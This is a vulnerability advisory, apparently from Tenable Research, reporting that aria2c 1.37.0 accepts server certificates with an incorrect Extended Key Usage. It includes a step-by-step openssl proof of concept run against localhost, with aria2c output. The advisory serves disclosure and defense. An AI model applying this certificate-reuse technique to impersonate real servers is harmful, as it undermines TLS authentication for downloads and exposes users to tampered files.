aria2c Improper Certificate Validation

By
Editor Dataproof
-
0
15

aria2c Improper Certificate Validation

Tenable Research discovered that aria2c accepts a server certificate with incorrect Extended Key Usage (EKU). If the attackers compromise a certificate (with the associated private key) issued for a different purpose, they may be able to reuse it for TLS server authentication.

 

Proof of Concept

In this PoC, we will demonstrate generating private keys and the corresponding X.509 certificates, configuring a TLS server to use them, and then how aria2c fails to properly validate a certificate not meant to be used for TLS server authentication. In a real attack, the attackers would reuse the X.509 certificate and its corresponding key they managed to compromise.

 

Generate a set of RSA keys:

openssl genrsa -out ca-key.pem 2048

openssl genrsa -out server-key.pem 2048

 

Create an OpenSSL config:

cat openssl-ca.cfg 

[ ca ]

keyUsage                = critical,digitalSignature,keyCertSign,cRLSign

extendedKeyUsage        = serverAuth,clientAuth

basicConstraints        = critical,CA:TRUE

subjectKeyIdentifier    = hash

authorityKeyIdentifier  = keyid:always

 

[ server ]

keyUsage                = critical,digitalSignature

extendedKeyUsage        = serverAuth

basicConstraints        = critical,CA:FALSE

subjectKeyIdentifier    = hash

authorityKeyIdentifier  = keyid:always

 

[ server-bad-eku ]

keyUsage                = critical,digitalSignature

extendedKeyUsage        = clientAuth

basicConstraints        = critical,CA:FALSE

subjectKeyIdentifier    = hash

authorityKeyIdentifier  = keyid:always

 

Generate root CA certificate:

openssl req -x509 -new -key ca-key.pem -days 365 -out ca-cert.pem -subj “/CN=TestCA” -config openssl-ca.cfg -extensions ca

 

Generate a certificate signing request:

openssl req -new -key server-key.pem -out server.csr -subj “/CN=server” -addext “subjectAltName = DNS:localhost”

 

Generate a valid server certificate:

openssl x509 -req -CA ca-cert.pem -CAkey ca-key.pem -CAcreateserial -in server.csr -out server-cert.pem -days 365 -extfile openssl-ca.cfg -extensions server -copy_extensions copyall

 

Check EKU the generated certificate:

openssl x509 -text -noout -in server-cert.pem | grep -i ‘Extended Key Usage’ -A1

            X509v3 Extended Key Usage: 

                TLS Web Server Authentication

 

Generate invalid server certificates with incorrect EKU:

openssl x509 -req -CA ca-cert.pem -CAkey ca-key.pem -CAcreateserial -in server.csr -out server-bad-eku-cert.pem -days 365 -extfile openssl-ca.cfg -extensions server-bad-eku -copy_extensions copyall

 

Check EKU in the generated certificate:

openssl x509 -text -noout -in server-bad-eku-cert.pem | grep -i ‘Extended Key Usage’ -A1

            X509v3 Extended Key Usage: 

                TLS Web Client Authentication

 

Start a server using a valid server certificate:

openssl s_server -key server-key.pem -cert server-cert.pem -www -port 8080

 

Connection succeeds as expected:

aria2c –ca-certificate=ca-cert.pem https://localhost:8080

 

04/30 18:14:37 [NOTICE] Downloading 1 item(s)

 

04/30 18:14:37 [NOTICE] Download complete: /home/parallels/aria2c/index.html

 

Download Results:

gid   |stat|avg speed  |path/URI

======+====+===========+=======================================================

9bf002|OK  |   588KiB/s|/home/parallels/aria2c/index.html

 

Status Legend:

(OK):download completed.

 

Start a server using a server certificate with incorrect EKU:

openssl s_server -key server-key.pem -cert server-bad-eku-cert.pem -www -port 8080

 

Connection succeeds while it shouldn’t:

aria2c –ca-certificate=ca-cert.pem https://localhost:8080

 

04/30 18:14:57 [NOTICE] Downloading 1 item(s)

 

04/30 18:14:57 [NOTICE] File already exists. Renamed to /home/parallels/aria2c/index.1.html.

 

04/30 18:14:57 [NOTICE] Download complete: /home/parallels/aria2c/index.1.html

 

Download Results:

gid   |stat|avg speed  |path/URI

======+====+===========+=======================================================

c6e101|OK  |   673KiB/s|/home/parallels/aria2c/index.1.html

 

Status Legend:

(OK):download completed.

 

 

aria2c –ca-certificate=ca-cert.pem –check-certificate https://localhost:8080

 

04/30 18:15:07 [NOTICE] Downloading 1 item(s)

 

04/30 18:15:07 [NOTICE] File already exists. Renamed to /home/parallels/aria2c/index.2.html.

 

04/30 18:15:07 [NOTICE] Download complete: /home/parallels/aria2c/index.2.html

 

Download Results:

gid   |stat|avg speed  |path/URI

======+====+===========+=======================================================

686fe6|OK  |   786KiB/s|/home/parallels/aria2c/index.2.html

 

Status Legend:

(OK):download completed.

 

aria2c –ca-certificate=ca-cert.pem –check-certificate=true https://localhost:8080

 

04/30 18:15:14 [NOTICE] Downloading 1 item(s)

 

04/30 18:15:14 [NOTICE] File already exists. Renamed to /home/parallels/aria2c/index.3.html.

 

04/30 18:15:14 [NOTICE] Download complete: /home/parallels/aria2c/index.3.html

 

Download Results:

gid   |stat|avg speed  |path/URI

======+====+===========+=======================================================

4a4aec|OK  |   786KiB/s|/home/parallels/aria2c/index.3.html

 

Status Legend:

(OK):download completed.

 

Version of aria2c which was tested on Ubuntu 24.04:

aria2c –version | head -n 1

aria2 version 1.37.0

 

Other versions may be vulnerable too, but we have not validated additional versions.

Ben Smith
– Read more

RELATED ARTICLESMORE FROM AUTHOR